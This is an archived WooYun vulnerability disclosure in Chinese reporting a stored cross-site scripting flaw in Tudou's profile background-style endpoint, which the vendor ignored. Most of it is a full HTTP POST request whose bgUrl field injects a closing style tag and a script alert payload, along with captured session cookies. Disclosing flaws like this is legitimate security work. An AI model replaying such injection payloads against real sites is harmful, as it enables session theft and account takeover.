乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-24: 细节已通知厂商并且等待厂商处理中 2016-02-29: 厂商已经主动忽略漏洞,细节向公众公开
找呀找呀找朋友!
在个人主页设置背景时,更改数据包
POST /home/page/saveStyle.do HTTP/1.1Host: www.tudou.comContent-Length: 277Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.tudou.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://www.tudou.com/home/_368634483/Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie:u_pic=http%3A%2F%2Fu3.tdimg.com%2F0%2F250%2F222%2F56524741474898092073452155745657974390.jpg; u_l=1; u_member=0; u_mmid=0; u_passport_info=8fdf23ca494b1e363a49d57ca0c54175; yktk=1%7C1456240569%7C15%7CaWQ6MzY4NjM0NDgzLG5uOkljZTI3Mjk2NzA1LHZpcDpmYWxzZSx5dGlkOjM2ODYzNDQ4Myx0aWQ6MA%3D%3D%7C4f098913263bfe058d7cfb2dcd293b03%7C270f0c7f8eb62f2db0fd082210163a6dd9f5f076; u_supply=1; ykss=ba77cc56ea43d26627979673; u=__LOGOUT__; vjuids=79d52f83b.1530eb44680.0.ac287b32; preferurl=; vjlast=1456240609.1456240609.30; seidtimeout=1456242549337; ypvid=1456240749353EzLKPE; ysestep=19; yseidtimeout=1456247949353; ycid=0; ystep=19; vt_01ac7b80ke2l2v=%5B%7B%22368634483%22%3A%5B1456156800000%2C1%5D%7D%5D; u_data=subnum%7C0Connection: closestyle={"bannerUrl":"","bannerId":"2","hasBanner":true,"bgUrl":"111.jpg\");</style><script>alert(1)</script>\"","hasBg":true,"repeatBg":true,"lockBg":true,"alignBg":"center","titleColor":"#33333","navColor":"#fe6700","bgColor":"#ffffff","opacity":0,"handCss":""}&homeId=99194129
提交以上代码,记得把cookie设置一下。主要是bgUrl参数
自己看吧
危害等级:无影响厂商忽略
忽略时间:2016-02-29 10:00
漏洞Rank:4 (WooYun评价)
暂无